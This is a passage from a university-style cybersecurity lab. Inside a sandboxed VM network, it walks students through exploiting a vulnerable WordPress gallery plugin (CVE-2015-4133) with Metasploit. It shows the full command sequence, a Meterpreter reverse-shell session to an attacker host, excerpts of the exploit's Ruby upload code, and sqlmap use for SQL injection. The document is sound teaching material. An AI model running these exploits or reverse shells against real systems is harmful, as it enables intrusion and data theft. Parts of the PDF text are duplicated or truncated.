11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 1/13

Last week, we started working with Vagrant and WPDistillery, running WordPress and Kali in separate VMs, and using the  wpscan  tool to probe an older version of WordPress for weaknesses…and exploit them. Hopefully, you were able to find some interesting exploits to understand how the types of vulnerabilities we looked at over the first six weeks, such as XSS and SQLI, actually work in the wild.

This is only the beginning, though. As proofs-of-concept, many specific web vulnerabilities like XSS only require a simple demonstration, such as a harmless javascript  alert  or some minor modification to an HTML page. Like a single link in a chain, they aren’t very interesting in isolation, but when combined with other links, these vulnerabilities can be wielded to great effect. Like martial arts students, we begin with the rudiments — simple moves, both attacks and blocks — before we can understand how these are combined into a repertoire of skills.

In practice, the offensive goal is usually achieving the highest level of access possible. The defensive goal is, if not to block the attack outright, to at least contain the damage by limiting the attacker’s access. Nobody plans for their user database to get stolen, but one still hashes and salts passwords anyway,

Week 8 Lab Exercises: WordPress vs. Kali, Round 2

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 2/13

because pwning happens. This week, we’re going to look at how specific exploits become full-blown attacks — and what can be done to stop them.

This week’s lab builds on the previous one in that we’ll be using the previous WP/Kali setup via Vagrant/VirtualBox. We’ll cover some of the same steps again, but refer to last week’s instructions if you need more of a refresher.

First, you’ll need to make sure you have the VirtualBox VMs setup in the same way as last week’s lab:

Running in VirtualBox Logged into desktop

Provisioned via Vagrant / WPDistillery Running version 4.2

If you are running a version other than 4.2 or if you break your WordPress server during an exploit, you can destroy the current WP instance and remove web content:

Linux and macOS

cd $HOME/WPDistillery vagrant destroy –force

Enter password for sudo if asked then delete WordPress content.

rm -rf public

Windows PowerShell (As Administrator)

cd $HOME\WPDistillery vagrant destroy –force Remove-Item -Recurse -Force .\public\

All Hosts

Edit  wpdistillery/config.yml  and change the following value:

# WordPress version wpversion: 4.2

Start it back up.

vagrant up

Saving Progress:  Whenever you need a break from hacking WordPress, you can gracefully shutdownWhenever you need a break from hacking WordPress, you can gracefully shutdown the server usingthe server using   vagrant halt . Whenever you wish to resume, use. Whenever you wish to resume, use   vagrant up   to start the server.to start the server. Make sure you are in the WPDistillery directory when entering the commandsMake sure you are in the WPDistillery directory when entering the commands (Hint:(Hint:   cd $HOME/WPDistillery ).).

Milestone 0: Preparing the Playing Field

Kali VM

WordPress VM

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 3/13

Before going further, shutdown the WordPress server usingBefore going further, shutdown the WordPress server using   vagrant halt   on the command line andon the command line and shutdown the Kali VM using either its own shutdown menu or through VirtualBox Manager.shutdown the Kali VM using either its own shutdown menu or through VirtualBox Manager.

There’s one more step required for this lab. Because VirtualBox places specific networking restrictions on VMs, we need to configure VirtualBox to allow communication between the Kali VM and the WordPress VM in order to execute a more sophisticated attack.

First, you need to determine the host-only adapter used by the WPDistillery VM. In the VirtualBox client, click one the WPDistillery VM so its information is displayed in the detail pain, and then look at the details under Network. Two adapters should be listed: one “NAT” and one “Host-Only Adapter” with a qualifier like  vboxnet0  — that is the host-only network in use, so make a note of it.

Next, you’ll need to setup a DHCP server for that network — this will allow automatic assignments of IP addresses. Go to the Host Network Manager in VirtualBox (via the File menu). When the Host Network Manager dialog comes up:

Bug Alerts:  Deleting and re-creating the host-only adapter during step 1 (below) is necessary in orderDeleting and re-creating the host-only adapter during step 1 (below) is necessary in order for Kali to pull an IP from the DHCP server later on. Otherwise DHCP will offer IPs in thefor Kali to pull an IP from the DHCP server later on. Otherwise DHCP will offer IPs in the 192.168.56.0/24 network instead of 192.168.33.0/24. On macOS you may have to re-apply changes192.168.56.0/24 network instead of 192.168.33.0/24. On macOS you may have to re-apply changes twice when setting up DHCP, double-check the numbers before closing the dialog.twice when setting up DHCP, double-check the numbers before closing the dialog.

1. Highlight the host-only network you indentified in the previous step and delete it and then re-create it, then click on the Properties button at the top of the dialog.

2. When the nested dialog appears, click on DHCP Server tab and set the following fields: ☑ Enable Server Server Address:  192.168.33.2 Server Mask:  255.255.255.0 Lower Address Bound:  192.168.33.100 Upper Address Bound:  192.168.33.200

Click Apply and Close to apply these changes and exit. Restart the WPDistillery VM using the command line ( vagrant up ) and confirm the WordPress site is still accessible via  wpdistillery.vm .

Now, back in the VirtualBox client, click on the Kali VM. If it is running, power it down (right-click on the VM, Close >> Power Off). Then in the Kali VM settings (right-click on the VM, Settings), add a second adapter pointing to the same host-only network:

1. Click on Network 2. Click on Adapter 2 and set the following fields:

☑ Enable Network Adapter Attached to:  Host-only Adapter Name: specify the host-only adapter modified in the previous step

3. Click OK 4. Start the Kali VM (right-click on the VM, Start >> Normal Start) 5. Open a terminal and run the following command to remove the default network profiles and reboot Kali

In Kali Terminal, run:  sudo rm /etc/NetworkManager/system-connections/* ; sudo reboot

Open a Hole

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 4/13

6. After Kali reboots, log back in and confirm that you have 3 interfaces output in Kali Terminal by opening a Terminal and running  ip addr :

lo (loopback) with IP address of 127.0.0.1 eth0 (NAT) with IP similar to 10.x.x.x eth1 (Host-only) with IP of 192.168.33.100

7. Verify connectivity to your WordPress server and the Internet from Kali. ping google.com ping wpdistillery.vm  or  ping 192.168.33.10

End the pings with  Ctrl  +  C

If the setup was successful, both Kali and WordPress should have access to 2 networks now. One is used for Internet access in order to facilitate downloading of WordPress plugins and Kali attack tools. The other network doesn’t have Internet access, but is only a network of the VM’s that are connected to it. This latter network is the one that’ll be used as a safe sandbox for practicing our exploits.

Our first victim is a WordPress plugin for displaying image galleries called Reflex Gallery.

1. In the WP admin console, go to Plugins -> Add New 2. Search for  reflex gallery  and you should see ReFlex Gallery » WordPress Photo Gallery 3. Click on the result but don’t install the plugin yet. Look at the Changelog tab for any critical security

issues that were patched and install the version just before it was patched. 4. On the right side of the dialog, where it lists the compatibility and installs data, click the WordPress.org

Plugin Page » link 5. You’ll be taken to the official WP plugin page. Click on the  Development  tab 6. Click Advanced View 7. Under Previous Versions, download the 3.1.3 zip file 8. In the WordPress admin console, go to Plugins -> Add New -> Upload Plugin, specify the zip file you

downloaded, then click Install Now 9. Go to admin console plugins page, find the plugin, and click Activate

Challenge: Beyond activating the plugin, you need to use it in a page or a post on the WP instance. Create a gallery and use it in a page before proceeding

Milestone 1: Opening an Attack Surface

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 5/13

The following steps should be run in the Kali VM’s Terminal emulator So we know the blog is accessible from the host OS and Kali VM at  wpdistillery.vm , which is simply a local IP aliased via the  /etc/hosts  file. Let’s re-run wpscan against the URL:

wpscan –url http://wpdistillery.vm –random-agent

The output should include the vulnerability associated with Reflex Gallery:

Arbitrary File Upload. Sounds promising. At this point, we could dig in, research the source code, come up with a carefully-crafted demonstration of the specific, underlying exploit. But instead of that, let’s just go right for the throat and attack this with a sledgehammer.

Metasploit is an exploitation framework. One of the most popular tools in Kali, it’s the free part of a larger, commercial project used widely in web security penetration testing. And by hackers. If wpscan is a dental pick, Metasploit is a set of carving knives.

Metasploit currently has over 1600 exploits, organized in different categories like:

Browser-based: a large collection of (mostly) remote code execution exploits Mobile: Android, iOS OS-specific: Linux, Windows, Solaris, etc. Combinations of the above

Metasploit currently has hundreds of payloads. Some of them are:

Command shells, enabling attackers to run scripts or arbitrary commands against a host Meterpreter payloads, enabling attackers to control the screen of a device using VNC and to browse, upload and download files Dynamic payloads, enabling attackers to evade anti-virus defenses by generating unique payloads

For this attack, we’ll be using Meterpreter to open a shell into the target machine. Read more about Meterpreter here

Metasploit uses a database to manage exploit/payload information and also attack data. So you need to initialize the DB, then load the console:

sudo service postgresql start sudo msfdb init msfconsole

[!] Title: Reflex Gallery <= 3.1.3 – Arbitrary File Upload Reference: https://wpvulndb.com/vulnerabilities/7867 Reference: http://packetstormsecurity.com/files/130845/ Reference: http://packetstormsecurity.com/files/131515/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133 Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_ Reference: https://www.exploit-db.com/exploits/36374/ [i] Fixed in: 3.1.4

Milestone 2: Recon

Milestone 3: Hello, Metasploit

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 6/13

Fun fact: you get different ASCII art every time. And they say hackers don’t care about UX. Note the command prompt has changed to  msf5 > . You are now in a shell within another shell within a VM.

In the snippets below, the  >  character denotes the end of the prompt (similar to how  $  is used to denote a non-root user’s bash prompt). For example,  msf5 >  is the MSF prompt. The commands to enter will follow the  >  in most of the examples below.

First check that the DB is connected OK. The DB isn’t strictly necessary but MSF runs faster with it.

msf5 > db_status [*] Connected to msf. Connection type: postgresql.

Now we’re ready.

In MSF, start by searching the exploit database for something related to the plugin affected by the vulnerability. You could search on several different terms to find something, but in this case, the plugin has an unusual word in its name, “Reflex”

Enter  search Reflex  into MSF:

Well, that sure looks handy. It’s even ranked excellent, which should suggest to you that not all of these tools are created equal. Some work better than others; some don’t work at all. In fact, what follows may not work perfectly for you, so don’t be too surprised if it doesn’t go swimmingly. These are hacks, after all: user- supported code and scripts whose primary purpose is to compromise systems, so robustness isn’t exactly a guarantee. Give it a shot, but be prepared for some possible difficulty ahead.

The command to use the exploit is unsurprisingly called  use  and takes the exploit’s name as an argument. Once loaded, the command prompt changes again, and you can run the  info command.

msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf5 exploit(wp_reflexgallery_file_upload) > info

Notice the output lists the affected version and some options we’ll need to set:

msf5 > search Reflex [!] Module database cache not built yet, using slow search

Matching Modules ================

Name Disclosure Date Rank Descriptio —- ————— —- ———– exploit/unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent WordPress

Milestone 4: Pwnage

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 7/13

Use the  set  command to specify  RHOST  accordingly. If your blog isn’t hosted at the root ( / ), you could additionally pass in the path by setting  TARGETURI  (but the WpDistillery setup should work with the default).

msf5 exploit(wp_reflexgallery_file_upload) > set RHOST wpdistillery.vm RHOST => wpdistillery.vm

Before we can run the exploit, we need to specify the  LHOST  i.e. which IP address should Kali (localhost) receive a shell on. The default might be in the NAT network in which cause the exploit will work but no session will be opened. To ensure that we get a shell back on the host-only adapter’s IP address, we will set it explicitly.

msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.33.100 LHOST => 192.168.33.100

You can probably guess the command used to finally run the exploit (it’ll take a minute to run):

Available targets: Id Name — —- 0 Reflex Gallery 3.1.3

Check supported: Yes

Basic options: Name Current Setting Required Description —- ————— ——– ———– Proxies no A proxy chain of format type:host:port[,type:host:p RHOSTS yes The target host(s), range CIDR identifier, or hosts RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application VHOST no HTTP server virtual host

Payload information:

Description: This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.

msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit

[*] Started reverse TCP handler on 192.168.33.100:4444 [+] Our payload is at: mcxgHJixsWZpS.php. Calling payload… [*] Calling payload… [*] Sending stage (38288 bytes) to 192.168.33.10 [*] Meterpreter session 1 opened (192.168.33.100:4444 -> 192.168.33.10:51778) at 2020-10-11 [+] Deleted mcxgHJixsWZpS.php

meterpreter >

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 8/13

Having problems? See the Troubleshooting section at the end of this milestone Notice the command prompt changed to  meterpreter > . The meterpreter payload ( mcxgHJixsWZpS.php ) was uploaded, executed, then deleted (just like campers, hackers should leave no trace), and now we have a connection to the target machine. Run the  shell  command when you see the  meterpreter >  prompt to load a new shell:

meterpreter > shell Process 5315 created. Channel 0 created.

A shell within a shell within a shell. But this shell is different; this shell is running on the WordPress VM. In case it’s not clear, you really shouldn’t be able to do that. Notice the new shell spawned by Meterpreter doesn’t bother with command prompts at all, so it might just look like nothing’s happening after the process and channel are created. Try running some commands, like  whoami and  pwd :

whoami www-data pwd /var/www/public/wp-content/uploads/2020/10 echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin exit meterpreter >

Lines 2, 4, and 6 in above snippet are output. It’s a low-fi shell, and somewhat limited, but it works, and it’s enough to compromise the whole machine. We can see we’re shell’d in as the  www-data  user and presently in one of the wordpress upload directories, which is where the malicious PHP payload was delivered.

The  exit  command on line 7 above gets us back to the  meterpreter >  prompt, which has fewer but more useable commands than the shell. For instance, we can poke around with  pwd ,  cd ,  ls , and  cat :

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 9/13

meterpreter > pwd /var/www/html/wp-content/uploads/2017/03 meterpreter > cd ../../.. meterpreter > pwd /var/www/html/wp-content meterpreter > ls Listing: /var/www/html/wp-content =================================

Mode Size Type Last modified Name —- —- —- ————- —- 100644/rw-r–r– 29 fil 2017-03-18 19:01:59 +0000 index.php 40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 plugins 40755/rwxr-xr-x 4096 dir 2017-03-16 20:06:21 +0000 themes 40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 upgrade 40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 uploads

meterpreter > cat index.php <?php // Silence is golden.

Meterpreter may fail to establish a connection after running  exploit  in Metasploit. This might be a one- off error, but if you can’t get it to work, here are a few alternatives you can try:

The whole setup can be simplified by bypassing the Kali VM and simply installing Metasploit to your host machine and running the same instructions from within Metasploit on your host machine. We don’t recommend this approach unless the above doesn’t work for you, for the simple reason that it’s not a great idea to install hacking tools on to your host system. By having things like Metasploit and vulnerable WordPress versions contained within VMs, any risks can be compartmentalized and easily cleaned up. That said, there’s nothing especially dangerous about installing Metasploit to your host system, but if you do install it, we’d recommend you remove it after the course is done.

As an alternative workaround to the above that still uses the Kali VM, you can setup port-forwarding through localhost. In VirtualBox, stop your Kali VM, open its Settings, and under Network, disable Adapter 2 (as created in Milestone 0), then switch back to Adapter 1 and click Port Forwarding. Click the Add button at right and use the following settings:

Name:  metasploit Protocol:  TCP Host IP:  127.0.0.1 Host Port:  4444 Guest IP: (leave blank) Guest Port:  4444

Click OK and retstart Kali. Then, in Metasploit, load the exploit (via  use ), set  LHOST  to your host PC’s IP address (not the VM IP) and  LPORT  to  4444 , then try  exploit  again.

Troubleshooting

Milestone 5: Tag it

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 10/13

Challenge: Make a change to the WP content. You can open a  vi  editor from  meterpreter > using the  edit <file>  command. Use this to alter one of the PHP files in some subtle, tasteful way. For example:

Meterpreter Cheat Sheet

And that’s pretty much game over for this scenario. Once an attacker is able to gain this level of access, a whole universe of options suddenly opens up. If the machine is configured appropriately, those options may be limited, but this is not a position any sysadmin wants be in, even with everything configured perfectly. In the best case scenario, the attack surface available to the intruder is intolerably large.

Congratulations: at this point, you are officially a script kiddie. Hopefully this has given you a sense of the power of these tools, how even a single, specific exploit affecting some random plugin can be weaponized in a way that’s frighteningly easy to use. In the above example, we just compromised the whole system, so it’s tempting to feel like there’s some real skill involved in what we’re doing here. But we’re standing on the shoulders of giants. Just go back and read more about Meterpreter:

“…an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.”

Now writing something like that takes real skill. Remember, everything available in Kali has been used extensively by others. Many of these kinds of tools started out as someone’s secret weapon of choice and gradually filtered out into the public domain. That’s not to say Kali isn’t powerful or even dangerous (it is). But the most effective, advanced attacks and tools in use today certainly aren’t bundled in Kali.

Nobody wants to be a script kiddie, and, sadly, in-memory DLL injection is beyond the scope of our skills at this point, but we can at least look at the exploit we just used and understand it. The link to the announcement and code for this exploit is actually listed as part of the  wpscan  output from Milestone 2 (rapid7 is the company that sells the commercial version of Metasploit). From there, you can get to the code for this exploit in Github. It’s written in Ruby. Don’t know Ruby? Doesn’t matter. Let’s look anyway:

Badge Earned: Script Kiddie

Milestone 6: Going Deeper

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 11/13

require ‘msf/core’

class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking

include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper

This is the  class  declaration of the module and associated  require  /  include  statements pulling in the required parts of MSF. Lines 11 and 12 show the payload and its delivery mechanism are just components of MSF.

Line 47 shows how the filename of the dropped payload is created randomly, and lines 49 – 51 show how the MIME attachment is created and how the encoded  payload  is added to it as a binary data stream, which is serialized as a string for the  POST  request.

And here’s the multipart upload  POST  request, which just mimics what the browser sends to the WordPress server when the user uploads a file. The plugin accepts the binary content just as it would for an image. Note the  uri  value contains the components of the path to the vulnerable source in the plugin.

if res.code == 200 && res.body =~ /success|#{php_pagename}/ print_good(“Our payload is at: #{php_pagename}. Calling payload…”) register_files_for_cleanup(php_pagename)

If the response code is OK, the module marks the uploaded file for cleanup, which happens immediately after the next step. The payload is deleted so obvious forensic evidence of the hack isn’t left on the target server.

Finally, the payload is activated via another HTTP request, which opens the Meterpreter connection.

def exploit php_pagename = rand_text_alpha(8 + rand(8)) + ‘.php’

data = Rex::MIME::Message.new data.add_part(payload.encoded, ‘application/octet-stream’, nil, “form-data; name=\”qqfi post_data = data.to_s

res = send_request_cgi({ ‘uri’ => normalize_uri(wordpress_url_plugins, ‘reflex-gallery’, ‘admin’, ‘script ‘method’ => ‘POST’, ‘vars_get’ => { ‘Year’ => “#{year}”, ‘Month’ => “#{month}” }, ‘ctype’ => “multipart/form-data; boundary=#{data.bound}”, ‘data’ => post_data })

send_request_cgi( ‘uri’ => normalize_uri(wordpress_url_wp_content, ‘uploads’, “#{year}”, “#{month )

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 12/13

One takeaway from this is that the framework, MSF, is doing all the heavy lifting here: the payload is provided (even in encoded form), activating it is a single function call, and even the cleanup is provided as a core function. All the author had to do here was create and issue a multipart  POST request.

Challenge: Now that we’ve walked through the exploit, go back to the Reflex Gallery plugin code and identify the fix — specifically, what was changed in the plugin code to prevent this attack?

Hints:

The plugin is written in PHP and Javascript — which part would this fix need be in, and why? Use the source browser changelog viewer to diff specific commits If you ran the MSF exploit agains the fixed version of the plugin, what specifically would fail? Two files related to the vulnerability were substantially changed between the two versions

If you think back to all of the Security Shepherd exercises around SQL injection, you probably noticed that finding the right combination of characters and expressions to use would very often boil down to trial and error, educated guesswork, and sometimes dumb luck. Being a coder, you may have thought it’d be nice to have a tool that automates all that guessing and testing. Say hello to our little friend  sqlmap , which does exactly that: given a URL and a parameter string, this tool will attempt to identify SQLI-vulnerable parameters by systematically trying various SQLI exploits — pretty much all of them — and if it finds the right way in, it can exfiltrate an entire database.

As such, one of the tricks to using  sqlmap  is knowing how not to use it. In the wrong hands, it becomes an accidental load-testing tool, firing off thousands of requests from multiple threads and crashing a database. In the right hands, it can identify novel routes for exploitation.

Read the usage docs on this one. In addition to the standard parameters, make sure you understand  threads ,  risk , and  level  that allow throttling and control how aggressively the tool will run. Try different verbosity settings to see what it’s actually doing under the hood.

Challenge: Examine this writeup about a recent SQLI vulnerability in a WP plugin. Follow the same process as before to identify the affected version from the changelog, install it manually, then recreate the exploit described in the writeup using  sqlmap  and confirm the researcher’s results.

Hints:

Actually read the usage docs Expect issues, be patient.  sqlmap  is basically hammering your WP VM, which isn’t designed to handle a heavy load. Look at the output carefully, even if there’s an error. Does it match the original findings? To see what it’s doing, try running with high verbosity ( -vvvv ). Try  CTRL-C  and  (S)skip  if something seems to hangs When in doubt, accept the default.

Milestone 7: Hello,  sqlmap

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 13/13